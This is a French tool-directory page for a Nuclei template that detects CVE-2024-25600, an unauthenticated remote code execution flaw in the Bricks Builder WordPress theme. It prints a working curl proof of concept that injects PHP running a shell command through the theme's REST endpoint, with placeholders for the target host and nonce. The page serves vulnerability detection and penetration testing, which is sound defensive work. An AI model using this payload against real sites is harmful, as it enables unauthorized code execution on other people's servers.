Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-25600_Nuclei-Template — Modèle Nuclei et informations sur le POC pour CVE-2024-25600 | Kitploit
Outils/GitHubGitHub/christbowel/cve-2024-25600_nuclei-template
Scanners de VulnérabilitésGénération de PayloadsExploitationExploitation d'Applications WebSécurité WebTests d'Intrusion
GitHubchristbowel/cve-2024-25600_nuclei-template

CVE-2024-25600_Nuclei-Template

Modèle Nuclei et informations sur le POC pour CVE-2024-25600

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
317il y a 2 ansVérifié par Kitploit

CVE-2024-25600_Nuclei-Template

Modèle Nuclei et informations sur le POC pour CVE-2024-25600

Description 📝

Le thème Bricks pour WordPress est vulnérable à une exécution de code à distance dans toutes les versions jusqu'à la version 1.9.6 incluse. Cela permet à des attaquants non authentifiés d'exécuter du code sur le serveur. Ce modèle 🛠️ est conçu pour détecter la vulnérabilité CVE-2024-25600 🕳️ trouvée dans le plugin Bricks Builder pour WordPress en utilisant nuclei. La vulnérabilité permet une exécution de code à distance non authentifiée sur les sites web affectés 💻.

Preuve de concept (PoC) 📝

Le POC complet (automatique) est disponible sur https://github.com/chocapikk/CVE-2024-25600.

Le PoC de base fourni par la divulgation est le suivant :

root@kitploit:~
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
  "postId": "1",
  "nonce": "[NONCE]",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}'

Remplacez [HOST] par le site web cible et [NONCE] par la valeur du nonce récupérée depuis le site.

Référence 📖

Pour plus d'informations sur la vulnérabilité CVE-2024-25600, veuillez consulter la divulgation détaillée sur Snicco.io.

Télécharger l’outil